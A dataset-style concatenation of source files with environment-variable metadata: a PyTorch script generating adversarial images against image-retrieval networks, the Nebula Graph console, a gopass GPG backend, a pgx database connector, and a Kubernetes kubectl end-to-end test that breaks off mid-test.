| [] | ["APP_ENV"] | go | 1 | 0 | |
test.py | from __future__ import print_function
import sys, time, copy, os, pdb, argparse, ast
from scipy.misc import imsave
import numpy as np
from PIL import Image
import matplotlib.pyplot as plt
import torch
import torch.nn as nn
from torch.autograd import Variable
import torch.nn.functional as F
import torchvision.transforms as transforms
import torchvision.transforms.functional as TF
import torchvision.models as models
from torch.utils.model_zoo import load_url
from cirtorch.layers import pooling
from cirtorch.layers import normalization
from cirtorch.datasets.datahelpers import imresize
from cirtorchclone.imageretrievalnet import init_network
from tma import tma
from utils import *
gpu_id = '0'
train_scales = [300,350,400,450,500,550,600,650,700,750,800,850,900,950,1024]
test_scales = [1024]
iters = 100
lr = 0.01
lam = 0
sigma_blur = 0.3
carrier_fn = 'data/input/flower.jpg'
# carrier_fn = 'data/input/sanjuan.jpg'
target_fn = 'data/input/notredame.jpg'
mode = 'hist'
pool = mode
# mode = 'global'
# pool = 'gem'
arch = 'alexnet'
modellist = arch+"-"+pool
testarch = 'alexnet'
testpool = 'gem'
testmodellist = testarch+"-"+testpool
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]=gpu_id
output_folder = 'data/'
# list of training networks / pooling
net_params = {'local_whitening':False,'regional':False,'whitening':False,'pretrained':True} # default cir network params
test_networks = []
for s in testmodellist.split("+"):
net_params['architecture'] = s.split("-")[0]
for s2 in testmodellist.split("-")[1:]:
net_params['pooling'] = s2
test_networks.append(init_network(net_params))
train_networks = []
for s in modellist.split("+"):
net_params['architecture'] = s.split("-")[0]
train_networks.append(init_network(net_params))
if mode == 'global': train_networks[-1].poolattack = s.split("-")[1:]
for n in train_networks: n.eval(); n.cuda();
imsize = 1024
train_scale_factors = [x / imsize for x in train_scales]
test_scale_factors = [x / imsize for x in test_scales]
use_cuda = torch.cuda.is_available()
dtype = torch.cuda.FloatTensor if use_cuda else torch.FloatTensor
for n in train_networks: n.cuda(); n.eval()
for n in test_networks: n.eval()
def loader(image_name, im_size):
return Variable(TF.to_tensor(imresize(Image.open(image_name), im_size))).unsqueeze(0)
target_img = img_loader(target_fn, imsize).type(dtype)
carrier_img = img_loader(carrier_fn, imsize).type(dtype)
carrier_img = center_crop(target_img, carrier_img)
carrier_img_org = carrier_img.clone().clamp_(0, 1)
print("TARGET "+target_fn+" CARRIER " + carrier_fn)
t = time.time()
attack_img = tma(train_networks, train_scale_factors, target_img, carrier_img, mode = mode, num_steps = iters, lr = lr, lam = lam, sigma_blur = sigma_blur, verbose = True)[0]
print("Elapsed time {:.4f}\n".format(time.time()-t))
# save to disk
img2save = np.transpose(attack_img.cpu().numpy(), (2,3,1,0)).squeeze()
imsave(output_folder+'/attack_image.png',img2save)
img_df = (attack_img-carrier_img_org)
img_df = (img_df-img_df.min()) / (img_df.max()-img_df.min())
img2save = np.transpose(img_df.cpu().numpy(), (2,3,1,0)).squeeze()
imsave(output_folder+'/attack_carrier_diff.png',img2save)
print("Evaluate descriptor similarity")
eval_sim(test_networks, test_scale_factors, target_img, carrier_img_org, attack_img)
| []
| []
| [
"CUDA_DEVICE_ORDER",
"CUDA_VISIBLE_DEVICES"
]
| [] | ["CUDA_DEVICE_ORDER", "CUDA_VISIBLE_DEVICES"] | python | 2 | 0 | |
main.go | /* Copyright (c) 2020 vesoft inc. All rights reserved.
*
* This source code is licensed under Apache 2.0 License,
* attached with Common Clause Condition 1.0, found in the LICENSES directory.
*/
package main
import (
"flag"
"fmt"
"log"
"os"
"path"
"path/filepath"
"strconv"
"strings"
"time"
"github.com/vesoft-inc/nebula-console/cli"
"github.com/vesoft-inc/nebula-console/printer"
nebula "github.com/vesoft-inc/nebula-go"
)
// Console side commands
const (
Unknown = -1
Quit = 0
SetCsv = 1
UnsetCsv = 2
PlayData = 3
Sleep = 4
SetDot = 5
UnsetDot = 6
)
var dataSetPrinter = printer.NewDataSetPrinter()
var planDescPrinter = printer.NewPlanDescPrinter()
var datasets = map[string]string{
"nba": "./data/nba.ngql",
}
func welcome(interactive bool) {
defer dataSetPrinter.UnsetOutCsv()
defer planDescPrinter.UnsetOutDot()
if !interactive {
return
}
fmt.Println()
fmt.Printf("Welcome to Nebula Graph!\n")
fmt.Println()
}
func bye(username string, interactive bool) {
fmt.Println()
fmt.Printf("Bye %s!\n", username)
fmt.Println(time.Now().In(time.Local).Format(time.RFC1123))
fmt.Println()
}
func printConsoleResp(msg string) {
fmt.Println(msg)
fmt.Println()
fmt.Println(time.Now().In(time.Local).Format(time.RFC1123))
fmt.Println()
}
func playData(data string) (string, error) {
path, exist := datasets[data]
if !exist {
return "", fmt.Errorf("dataset %s, not existed", data)
}
fd, err := os.Open(path)
if err != nil {
return "", err
}
c := cli.NewnCli(fd, false, "", func() { fd.Close() })
c.PlayingData(true)
defer c.PlayingData(false)
fmt.Printf("Start loading dataset %s...\n", data)
childSession, err := pool.GetSession(*username, *password)
if err != nil {
log.Panicf("Fail to create a new session from connection pool, %s", err.Error())
}
defer childSession.Release()
err = loop(childSession, c)
if err != nil {
return "", err
}
respErr := c.GetRespError()
if respErr != "" {
return "", fmt.Errorf(respErr)
}
return c.GetSpace(), nil
}
// Console side cmd will not be sent to server
func isConsoleCmd(cmd string) (isLocal bool, localCmd int, args []string) {
// Currently, command "exit" and "quit" can also exit the console
if cmd == "exit" || cmd == "quit" {
isLocal = true
localCmd = Quit
return
}
plain := strings.TrimSpace(strings.ToLower(cmd))
if len(plain) < 1 || plain[0] != ':' {
return
}
isLocal = true
words := strings.Fields(plain[1:])
switch len(words) {
case 1:
if words[0] == "exit" || words[0] == "quit" {
localCmd = Quit
} else {
localCmd = Unknown
}
case 2:
if words[0] == "unset" && words[1] == "csv" {
localCmd = UnsetCsv
} else if words[0] == "unset" && words[1] == "dot" {
localCmd = UnsetDot
} else if words[0] == "sleep" {
localCmd = Sleep
args = []string{words[1]}
} else if words[0] == "play" {
localCmd = PlayData
args = []string{words[1]}
} else {
localCmd = Unknown
}
case 3:
if words[0] == "set" && words[1] == "csv" {
localCmd = SetCsv
args = []string{words[2]}
} else if words[0] == "set" && words[1] == "dot" {
localCmd = SetDot
args = []string{words[2]}
} else {
localCmd = Unknown
}
default:
localCmd = Unknown
}
return
}
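// executeConsoleCmd runs a console-side command. For the ":play <dataset>"
// command it returns the name of the space the dataset was loaded into, so the
// caller can switch the session to it; for all other commands it returns "".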
func executeConsoleCmd(cmd int, args []string) (newSpace string) {
switch cmd {
case SetCsv:
dataSetPrinter.SetOutCsv(args[0])
case UnsetCsv:
dataSetPrinter.UnsetOutCsv()
case SetDot:
planDescPrinter.SetOutDot(args[0])
case UnsetDot:
planDescPrinter.UnsetOutDot()
case PlayData:
var err error
newSpace, err = playData(args[0])
if err != nil {
printConsoleResp("Error: load dataset failed, " + err.Error())
} else {
printConsoleResp("Load dataset succeeded!")
}
case Sleep:
i, err := strconv.Atoi(args[0])
if err != nil {
printConsoleResp("Error: invalid integer, " + err.Error())
}
time.Sleep(time.Duration(i) * time.Second)
default:
printConsoleResp("Error: this local command not exists!")
}
return newSpace
}
func printResultSet(res *nebula.ResultSet, duration time.Duration) {
if !res.IsSucceed() && !res.IsPartialSucceed() {
fmt.Printf("[ERROR (%d)]: %s", res.GetErrorCode(), res.GetErrorMsg())
fmt.Println()
fmt.Println()
return
}
// Show table
if res.IsSetData() {
dataSetPrinter.PrintDataSet(res)
numRows := res.GetRowSize()
if numRows > 0 {
fmt.Printf("Got %d rows (time spent %d/%d us)\n", numRows, res.GetLatency(), duration/1000)
} else {
fmt.Printf("Empty set (time spent %d/%d us)\n", res.GetLatency(), duration/1000)
}
} else {
fmt.Printf("Execution succeeded (time spent %d/%d us)\n", res.GetLatency(), duration/1000)
}
if res.IsPartialSucceed() {
fmt.Println()
fmt.Printf("[WARNING]: Got partial result.")
}
if res.IsSetComment() {
fmt.Println()
fmt.Printf("[WARNING]: %s", res.GetComment())
}
if res.IsSetPlanDesc() {
fmt.Println()
fmt.Printf("Execution Plan (optimize time %d us)\n", res.GetPlanDesc().GetOptimizeTimeInUs())
fmt.Println()
planDescPrinter.PrintPlanDesc(res)
}
fmt.Println()
}
// loop reads and executes requests until a fatal error or a timeout occurs.
// Each line is treated as one query;
// add line breaks yourself, e.g. `SHOW \<CR>HOSTS`.
func loop(session *nebula.Session, c cli.Cli) error {
for {
line, exit, err := c.ReadLine()
if err != nil {
return err
}
if exit { // Ctrl+D
fmt.Println()
return nil
}
if len(line) == 0 {
continue
}
// Console side command
if isLocal, cmd, args := isConsoleCmd(line); isLocal {
if cmd == Quit {
return nil
}
newSpace := executeConsoleCmd(cmd, args)
if newSpace != "" {
c.SetSpace(newSpace)
session.Execute(fmt.Sprintf("USE %s", newSpace))
if err != nil {
return err
}
}
continue
}
// Server side command
start := time.Now()
res, err := session.Execute(line)
if err != nil {
return err
}
if !res.IsSucceed() && !res.IsPartialSucceed() {
c.SetRespError(fmt.Sprintf("[ERROR (%d)]: %s", res.GetErrorCode(), res.GetErrorMsg()))
if c.IsPlayingData() {
break
}
}
duration := time.Since(start)
if c.Output() {
printResultSet(res, duration)
fmt.Println(time.Now().In(time.Local).Format(time.RFC1123))
fmt.Println()
}
c.SetSpace(res.GetSpaceName())
}
return nil
}
// Nebula Console version related
var (
gitCommit string
buildDate string
)
var (
address *string = flag.String("addr", "127.0.0.1", "The Nebula Graph IP/HOST address")
port *int = flag.Int("P", -1, "The Nebula Graph Port")
username *string = flag.String("u", "", "The Nebula Graph login user name")
password *string = flag.String("p", "", "The Nebula Graph login password")
timeout *int = flag.Int("t", 0, "The Nebula Graph client connection timeout in seconds, 0 means never timeout")
script *string = flag.String("e", "", "The nGQL directly")
file *string = flag.String("f", "", "The nGQL script file name")
version *bool = flag.Bool("v", false, "The Nebula Console version")
)
func init() {
flag.StringVar(address, "address", "127.0.0.1", "The Nebula Graph IP/HOST address")
flag.IntVar(port, "port", -1, "The Nebula Graph Port")
flag.StringVar(username, "user", "", "The Nebula Graph login user name")
flag.StringVar(password, "password", "", "The Nebula Graph login password")
flag.IntVar(timeout, "timeout", 0, "The Nebula Graph client connection timeout in seconds, 0 means never timeout")
flag.StringVar(script, "eval", "", "The nGQL directly")
flag.StringVar(file, "file", "", "The nGQL script file name")
flag.BoolVar(version, "version", false, "The Nebula Console version")
}
func validateFlags() {
if *port == -1 {
log.Panicf("Error: argument port is missed!")
}
if len(*username) == 0 {
log.Panicf("Error: username is empty!")
}
if len(*password) == 0 {
log.Panicf("Error: password is empty!")
}
}
var pool *nebula.ConnectionPool
func main() {
flag.Parse()
if flag.NFlag() == 1 && *version {
fmt.Printf("nebula-console version Git: %s, Build Time: %s\n", gitCommit, buildDate)
return
}
// Check if flags are valid
validateFlags()
interactive := *script == "" && *file == ""
historyHome := os.Getenv("HOME")
if historyHome == "" {
ex, err := os.Executable()
if err != nil {
log.Panicf("Get executable failed: %s", err.Error())
}
historyHome = filepath.Dir(ex) // Set to executable folder
}
hostAddress := nebula.HostAddress{Host: *address, Port: *port}
hostList := []nebula.HostAddress{hostAddress}
poolConfig := nebula.PoolConfig{
TimeOut: time.Duration(*timeout) * time.Millisecond,
IdleTime: 0 * time.Millisecond,
MaxConnPoolSize: 2,
MinConnPoolSize: 0,
}
var err error
pool, err = nebula.NewConnectionPool(hostList, poolConfig, nebula.DefaultLogger{})
if err != nil {
log.Panicf(fmt.Sprintf("Fail to initialize the connection pool, host: %s, port: %d, %s", *address, *port, err.Error()))
}
defer pool.Close()
session, err := pool.GetSession(*username, *password)
if err != nil {
log.Panicf("Fail to create a new session from connection pool, %s", err.Error())
}
defer session.Release()
welcome(interactive)
defer bye(*username, interactive)
var c cli.Cli = nil
// Loop the request
if interactive {
historyFile := path.Join(historyHome, ".nebula_history")
c = cli.NewiCli(historyFile, *username)
} else if *script != "" {
c = cli.NewnCli(strings.NewReader(*script), true, *username, nil)
} else if *file != "" {
fd, err := os.Open(*file)
if err != nil {
log.Panicf("Open file %s failed, %s", *file, err.Error())
}
c = cli.NewnCli(fd, true, *username, func() { fd.Close() })
}
if c == nil {
return
}
defer c.Close()
err = loop(session, c)
if err != nil {
log.Panicf("Loop error, %s", err.Error())
}
}
| [
"\"HOME\""
]
| []
| [
"HOME"
]
| [] | ["HOME"] | go | 1 | 0 | |
internal/backend/crypto/gpg/cli/gpg.go | // Package cli implements a GPG CLI crypto backend.
package cli
import (
"context"
"os"
"github.com/gopasspw/gopass/internal/backend/crypto/gpg"
"github.com/gopasspw/gopass/pkg/debug"
lru "github.com/hashicorp/golang-lru"
)
var (
// defaultArgs contains the default GPG args for non-interactive use. Note: Do not use '--batch'
// as this will disable (necessary) passphrase questions!
defaultArgs = []string{"--quiet", "--yes", "--compress-algo=none", "--no-encrypt-to", "--no-auto-check-trustdb"}
// Ext is the file extension used by this backend
Ext = "gpg"
// IDFile is the name of the recipients file used by this backend
IDFile = ".gpg-id"
)
// GPG is a gpg wrapper
type GPG struct {
binary string
args []string
pubKeys gpg.KeyList
privKeys gpg.KeyList
listCache *lru.TwoQueueCache
throwKids bool
}
// Config is the gpg wrapper config
type Config struct {
Binary string
Args []string
Umask int
}
// New creates a new GPG wrapper
func New(ctx context.Context, cfg Config) (*GPG, error) {
// ensure created files don't have group or world perms set
// this setting should be inherited by sub-processes
umask(cfg.Umask)
// make sure GPG_TTY is set (if possible)
if gt := os.Getenv("GPG_TTY"); gt == "" {
if t := tty(); t != "" {
_ = os.Setenv("GPG_TTY", t)
}
}
gcfg, err := gpgConfig()
if err != nil {
debug.Log("failed to read GPG config: %s", err)
}
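// gpg's "throw-keyids" option omits recipient key IDs from encrypted messages;
// remember whether it is configured so the backend can handle ciphertexts
// whose recipients cannot be listed from the ciphertext itself.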
_, throwKids := gcfg["throw-keyids"]
g := &GPG{
binary: "gpg",
args: append(defaultArgs, cfg.Args...),
throwKids: throwKids,
}
debug.Log("initializing LRU cache")
cache, err := lru.New2Q(1024)
if err != nil {
return nil, err
}
g.listCache = cache
debug.Log("LRU cache initialized")
debug.Log("detecting binary")
bin, err := Binary(ctx, cfg.Binary)
if err != nil {
return nil, err
}
g.binary = bin
debug.Log("binary detected")
return g, nil
}
// Initialized always returns nil
func (g *GPG) Initialized(ctx context.Context) error {
return nil
}
// Name returns gpg
func (g *GPG) Name() string {
return "gpg"
}
// Ext returns gpg
func (g *GPG) Ext() string {
return Ext
}
// IDFile returns .gpg-id
func (g *GPG) IDFile() string {
return IDFile
}
| [
"\"GPG_TTY\""
]
| []
| [
"GPG_TTY"
]
| [] | ["GPG_TTY"] | go | 1 | 0 | |
internal/pkg/db/db.go | package db
import (
"context"
"fmt"
"github.com/jackc/pgx/v4/pgxpool"
_ "github.com/jackc/pgx/v4/stdlib"
)
var Pool *pgxpool.Pool
func Db() (*pgxpool.Pool, error) {
fmt.Println("Connecting to DB...")
cs := "host='%v' user='%v' password='%v' dbname='%v'"
connectionString := fmt.Sprintf(cs,
"database",
"docker",
"docker",
"docker",
)
// Alternatively, read the connection string from the environment: pgxpool.ParseConfig(os.Getenv("DATABASE_URL"))
fmt.Printf("Using DB Connection String [%s] \n", connectionString)
var err error
Pool, err = pgxpool.Connect(context.Background(), connectionString)
if err != nil {
return nil, err
}
return Pool, nil
}
| [
"\"DATABASE_URL\""
]
| []
| [
"DATABASE_URL"
]
| [] | ["DATABASE_URL"] | go | 1 | 0 | |
test/e2e/kubectl/kubectl.go | /*
Copyright 2015 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
// OWNER = sig/cli
package kubectl
import (
"bytes"
"context"
"encoding/json"
"fmt"
"io"
"io/ioutil"
"log"
"net"
"net/http"
"net/http/httptest"
"os"
"os/exec"
"path"
"path/filepath"
"regexp"
"sort"
"strconv"
"strings"
"text/template"
"time"
"github.com/elazarl/goproxy"
"github.com/ghodss/yaml"
"k8s.io/api/core/v1"
rbacv1beta1 "k8s.io/api/rbac/v1beta1"
apierrs "k8s.io/apimachinery/pkg/api/errors"
"k8s.io/apimachinery/pkg/api/resource"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/labels"
"k8s.io/apimachinery/pkg/runtime/schema"
utilnet "k8s.io/apimachinery/pkg/util/net"
"k8s.io/apimachinery/pkg/util/uuid"
"k8s.io/apimachinery/pkg/util/wait"
"k8s.io/apiserver/pkg/authentication/serviceaccount"
genericregistry "k8s.io/apiserver/pkg/registry/generic/registry"
clientset "k8s.io/client-go/kubernetes"
"k8s.io/kubernetes/pkg/controller"
"k8s.io/kubernetes/test/e2e/framework"
"k8s.io/kubernetes/test/e2e/framework/testfiles"
"k8s.io/kubernetes/test/e2e/scheduling"
testutils "k8s.io/kubernetes/test/utils"
uexec "k8s.io/utils/exec"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
"k8s.io/kubernetes/pkg/kubectl/polymorphichelpers"
imageutils "k8s.io/kubernetes/test/utils/image"
)
const (
updateDemoSelector = "name=update-demo"
guestbookStartupTimeout = 10 * time.Minute
guestbookResponseTimeout = 3 * time.Minute
simplePodSelector = "name=nginx"
simplePodName = "nginx"
nginxDefaultOutput = "Welcome to nginx!"
simplePodPort = 80
pausePodSelector = "name=pause"
pausePodName = "pause"
busyboxPodSelector = "app=busybox1"
busyboxPodName = "busybox1"
runJobTimeout = 5 * time.Minute
kubeCtlManifestPath = "test/e2e/testing-manifests/kubectl"
redisControllerFilename = "redis-master-controller.json.in"
redisServiceFilename = "redis-master-service.json"
nginxDeployment1Filename = "nginx-deployment1.yaml.in"
nginxDeployment2Filename = "nginx-deployment2.yaml.in"
nginxDeployment3Filename = "nginx-deployment3.yaml.in"
)
var (
nautilusImage = imageutils.GetE2EImage(imageutils.Nautilus)
kittenImage = imageutils.GetE2EImage(imageutils.Kitten)
redisImage = imageutils.GetE2EImage(imageutils.Redis)
nginxImage = imageutils.GetE2EImage(imageutils.Nginx)
busyboxImage = imageutils.GetE2EImage(imageutils.BusyBox)
)
var testImages = struct {
GBFrontendImage string
PauseImage string
NginxImage string
NginxNewImage string
RedisImage string
GBRedisSlaveImage string
NautilusImage string
KittenImage string
}{
imageutils.GetE2EImage(imageutils.GBFrontend),
imageutils.GetE2EImage(imageutils.Pause),
imageutils.GetE2EImage(imageutils.Nginx),
imageutils.GetE2EImage(imageutils.NginxNew),
imageutils.GetE2EImage(imageutils.Redis),
imageutils.GetE2EImage(imageutils.GBRedisSlave),
imageutils.GetE2EImage(imageutils.Nautilus),
imageutils.GetE2EImage(imageutils.Kitten),
}
var (
proxyRegexp = regexp.MustCompile("Starting to serve on 127.0.0.1:([0-9]+)")
CronJobGroupVersionResourceAlpha = schema.GroupVersionResource{Group: "batch", Version: "v2alpha1", Resource: "cronjobs"}
CronJobGroupVersionResourceBeta = schema.GroupVersionResource{Group: "batch", Version: "v1beta1", Resource: "cronjobs"}
)
// cleanupKubectlInputs deletes everything defined in fileContents from namespace ns and checks that everything matching the given selectors in that namespace is correctly stopped.
// Aware of the kubectl example files map.
func cleanupKubectlInputs(fileContents string, ns string, selectors ...string) {
By("using delete to clean up resources")
var nsArg string
if ns != "" {
nsArg = fmt.Sprintf("--namespace=%s", ns)
}
// Support backward compatibility: file paths or raw JSON, since we are removing file-path
// dependencies from this test.
framework.RunKubectlOrDieInput(fileContents, "delete", "--grace-period=0", "--force", "-f", "-", nsArg)
framework.AssertCleanup(ns, selectors...)
}
func substituteImageName(content string) string {
contentWithImageName := new(bytes.Buffer)
tmpl, err := template.New("imagemanifest").Parse(content)
if err != nil {
framework.Failf("Failed Parse the template: %v", err)
}
err = tmpl.Execute(contentWithImageName, testImages)
if err != nil {
framework.Failf("Failed executing template: %v", err)
}
return contentWithImageName.String()
}
func readTestFileOrDie(file string) []byte {
return testfiles.ReadOrDie(path.Join(kubeCtlManifestPath, file), Fail)
}
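// runKubectlRetryOrDie retries a kubectl call up to five times on optimistic
// concurrency ("Operation cannot be fulfilled") conflicts and fails the test
// on any other error.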
func runKubectlRetryOrDie(args ...string) string {
var err error
var output string
for i := 0; i < 5; i++ {
output, err = framework.RunKubectl(args...)
if err == nil || (!strings.Contains(err.Error(), genericregistry.OptimisticLockErrorMsg) && !strings.Contains(err.Error(), "Operation cannot be fulfilled")) {
break
}
time.Sleep(time.Second)
}
// Expect no errors to be present after retries are finished
// Copied from framework #ExecOrDie
framework.Logf("stdout: %q", output)
Expect(err).NotTo(HaveOccurred())
return output
}
// duplicated setup to avoid polluting "normal" clients with alpha features which confuses the generated clients
var _ = SIGDescribe("Kubectl alpha client", func() {
defer GinkgoRecover()
f := framework.NewDefaultFramework("kubectl")
var c clientset.Interface
var ns string
BeforeEach(func() {
c = f.ClientSet
ns = f.Namespace.Name
})
framework.KubeDescribe("Kubectl run CronJob", func() {
var nsFlag string
var cjName string
BeforeEach(func() {
nsFlag = fmt.Sprintf("--namespace=%v", ns)
cjName = "e2e-test-echo-cronjob-alpha"
})
AfterEach(func() {
framework.RunKubectlOrDie("delete", "cronjobs", cjName, nsFlag)
})
It("should create a CronJob", func() {
framework.SkipIfMissingResource(f.DynamicClient, CronJobGroupVersionResourceAlpha, f.Namespace.Name)
schedule := "*/5 * * * ?"
framework.RunKubectlOrDie("run", cjName, "--restart=OnFailure", "--generator=cronjob/v2alpha1",
"--schedule="+schedule, "--image="+busyboxImage, nsFlag)
By("verifying the CronJob " + cjName + " was created")
sj, err := c.BatchV1beta1().CronJobs(ns).Get(cjName, metav1.GetOptions{})
if err != nil {
framework.Failf("Failed getting CronJob %s: %v", cjName, err)
}
if sj.Spec.Schedule != schedule {
framework.Failf("Failed creating a CronJob with correct schedule %s", schedule)
}
containers := sj.Spec.JobTemplate.Spec.Template.Spec.Containers
if checkContainersImage(containers, busyboxImage) {
framework.Failf("Failed creating CronJob %s for 1 pod with expected image %s: %#v", cjName, busyboxImage, containers)
}
if sj.Spec.JobTemplate.Spec.Template.Spec.RestartPolicy != v1.RestartPolicyOnFailure {
framework.Failf("Failed creating a CronJob with correct restart policy for --restart=OnFailure")
}
})
})
})
var _ = SIGDescribe("Kubectl client", func() {
defer GinkgoRecover()
f := framework.NewDefaultFramework("kubectl")
// Reusable cluster state function. This won't be adversely affected by lazy initialization of framework.
clusterState := func() *framework.ClusterVerification {
return f.NewClusterVerification(
f.Namespace,
framework.PodStateVerification{
Selectors: map[string]string{"app": "redis"},
ValidPhases: []v1.PodPhase{v1.PodRunning /*v1.PodPending*/},
})
}
forEachPod := func(podFunc func(p v1.Pod)) {
clusterState().ForEach(podFunc)
}
var c clientset.Interface
var ns string
BeforeEach(func() {
c = f.ClientSet
ns = f.Namespace.Name
})
// Customized Wait / ForEach wrapper for this test. These demonstrate the
// idiomatic way to wrap the ClusterVerification structs for syntactic sugar in large
// test files.
// Print debug info if atLeast Pods are not found before the timeout
waitForOrFailWithDebug := func(atLeast int) {
pods, err := clusterState().WaitFor(atLeast, framework.PodStartTimeout)
if err != nil || len(pods) < atLeast {
// TODO: Generalize integrating debug info into these tests so we always get debug info when we need it
framework.DumpAllNamespaceInfo(f.ClientSet, ns)
framework.Failf("Verified %d of %d pods , error: %v", len(pods), atLeast, err)
}
}
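// debugDiscovery dumps the kubectl discovery cache (the v1 serverresources.json
// files under $HOME/.kube/cache/discovery) to the test log, which helps when a
// scale or rolling-update call fails because of a stale cached discovery doc.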
debugDiscovery := func() {
home := os.Getenv("HOME")
if len(home) == 0 {
framework.Logf("no $HOME envvar set")
return
}
cacheDir := filepath.Join(home, ".kube", "cache", "discovery")
err := filepath.Walk(cacheDir, func(path string, info os.FileInfo, err error) error {
if err != nil {
return err
}
// only pay attention to $host_$port/v1/serverresources.json files
subpath := strings.TrimPrefix(path, cacheDir+string(filepath.Separator))
parts := filepath.SplitList(subpath)
if len(parts) != 3 || parts[1] != "v1" || parts[2] != "serverresources.json" {
return nil
}
framework.Logf("%s modified at %s (current time: %s)", path, info.ModTime(), time.Now())
data, readError := ioutil.ReadFile(path)
if readError != nil {
framework.Logf("%s error: %v", path, readError)
} else {
framework.Logf("%s content: %s", path, string(data))
}
return nil
})
framework.Logf("scanned %s for discovery docs: %v", home, err)
}
framework.KubeDescribe("Update Demo", func() {
var nautilus, kitten string
BeforeEach(func() {
updateDemoRoot := "test/fixtures/doc-yaml/user-guide/update-demo"
nautilus = substituteImageName(string(testfiles.ReadOrDie(filepath.Join(updateDemoRoot, "nautilus-rc.yaml.in"), Fail)))
kitten = substituteImageName(string(testfiles.ReadOrDie(filepath.Join(updateDemoRoot, "kitten-rc.yaml.in"), Fail)))
})
/*
Release : v1.9
Testname: Kubectl, replication controller
Description: Create a Pod and a container with a given image. Configure replication controller to run 2 replicas. The number of running instances of the Pod MUST equal the number of replicas set on the replication controller which is 2.
*/
framework.ConformanceIt("should create and stop a replication controller ", func() {
defer cleanupKubectlInputs(nautilus, ns, updateDemoSelector)
By("creating a replication controller")
framework.RunKubectlOrDieInput(nautilus, "create", "-f", "-", fmt.Sprintf("--namespace=%v", ns))
framework.ValidateController(c, nautilusImage, 2, "update-demo", updateDemoSelector, getUDData("nautilus.jpg", ns), ns)
})
/*
Release : v1.9
Testname: Kubectl, scale replication controller
Description: Create a Pod and a container with a given image. Configure replication controller to run 2 replicas. The number of running instances of the Pod MUST equal the number of replicas set on the replication controller which is 2. Update the replicaset to 1. Number of running instances of the Pod MUST be 1. Update the replicaset to 2. Number of running instances of the Pod MUST be 2.
*/
framework.ConformanceIt("should scale a replication controller ", func() {
defer cleanupKubectlInputs(nautilus, ns, updateDemoSelector)
By("creating a replication controller")
framework.RunKubectlOrDieInput(nautilus, "create", "-f", "-", fmt.Sprintf("--namespace=%v", ns))
framework.ValidateController(c, nautilusImage, 2, "update-demo", updateDemoSelector, getUDData("nautilus.jpg", ns), ns)
By("scaling down the replication controller")
debugDiscovery()
framework.RunKubectlOrDie("scale", "rc", "update-demo-nautilus", "--replicas=1", "--timeout=5m", fmt.Sprintf("--namespace=%v", ns))
framework.ValidateController(c, nautilusImage, 1, "update-demo", updateDemoSelector, getUDData("nautilus.jpg", ns), ns)
By("scaling up the replication controller")
debugDiscovery()
framework.RunKubectlOrDie("scale", "rc", "update-demo-nautilus", "--replicas=2", "--timeout=5m", fmt.Sprintf("--namespace=%v", ns))
framework.ValidateController(c, nautilusImage, 2, "update-demo", updateDemoSelector, getUDData("nautilus.jpg", ns), ns)
})
/*
Release : v1.9
Testname: Kubectl, rolling update replication controller
Description: Create a Pod and a container with a given image. Configure replication controller to run 2 replicas. The number of running instances of the Pod MUST equal the number of replicas set on the replication controller which is 2. Run a rolling update to run a different version of the container. All running instances SHOULD now be running the newer version of the container as part of the rolling update.
*/
framework.ConformanceIt("should do a rolling update of a replication controller ", func() {
By("creating the initial replication controller")
framework.RunKubectlOrDieInput(string(nautilus[:]), "create", "-f", "-", fmt.Sprintf("--namespace=%v", ns))
framework.ValidateController(c, nautilusImage, 2, "update-demo", updateDemoSelector, getUDData("nautilus.jpg", ns), ns)
By("rolling-update to new replication controller")
debugDiscovery()
framework.RunKubectlOrDieInput(string(kitten[:]), "rolling-update", "update-demo-nautilus", "--update-period=1s", "-f", "-", fmt.Sprintf("--namespace=%v", ns))
framework.ValidateController(c, kittenImage, 2, "update-demo", updateDemoSelector, getUDData("kitten.jpg", ns), ns)
// Everything will hopefully be cleaned up when the namespace is deleted.
})
})
framework.KubeDescribe("Guestbook application", func() {
forEachGBFile := func(run func(s string)) {
guestbookRoot := "test/e2e/testing-manifests/guestbook"
for _, gbAppFile := range []string{
"redis-slave-service.yaml",
"redis-master-service.yaml",
"frontend-service.yaml",
"frontend-deployment.yaml.in",
"redis-master-deployment.yaml.in",
"redis-slave-deployment.yaml.in",
} {
contents := substituteImageName(string(testfiles.ReadOrDie(filepath.Join(guestbookRoot, gbAppFile), Fail)))
run(contents)
}
}
/*
Release : v1.9
Testname: Kubectl, guestbook application
Description: Create Guestbook application that contains redis server, 2 instances of redis slave, frontend application, frontend service and redis master service and redis slave service. Using frontend service, the test will write an entry into the guestbook application which will store the entry into the backend redis database. Application flow MUST work as expected and the data written MUST be available to read.
*/
framework.ConformanceIt("should create and stop a working application ", func() {
defer forEachGBFile(func(contents string) {
cleanupKubectlInputs(contents, ns)
})
By("creating all guestbook components")
forEachGBFile(func(contents string) {
framework.Logf(contents)
framework.RunKubectlOrDieInput(contents, "create", "-f", "-", fmt.Sprintf("--namespace=%v", ns))
})
By("validating guestbook app")
validateGuestbookApp(c, ns)
})
})
framework.KubeDescribe("Simple pod", func() {
var podYaml string
BeforeEach(func() {
By(fmt.Sprintf("creating the pod from %v", podYaml))
podYaml = substituteImageName(string(readTestFileOrDie("pod-with-readiness-probe.yaml.in")))
framework.RunKubectlOrDieInput(podYaml, "create", "-f", "-", fmt.Sprintf("--namespace=%v", ns))
Expect(framework.CheckPodsRunningReady(c, ns, []string{simplePodName}, framework.PodStartTimeout)).To(BeTrue())
})
AfterEach(func() {
cleanupKubectlInputs(podYaml, ns, simplePodSelector)
})
It("should support exec", func() {
By("executing a command in the container")
execOutput := framework.RunKubectlOrDie("exec", fmt.Sprintf("--namespace=%v", ns), simplePodName, "echo", "running", "in", "container")
if e, a := "running in container", strings.TrimSpace(execOutput); e != a {
framework.Failf("Unexpected kubectl exec output. Wanted %q, got %q", e, a)
}
By("executing a very long command in the container")
veryLongData := make([]rune, 20000)
for i := 0; i < len(veryLongData); i++ {
veryLongData[i] = 'a'
}
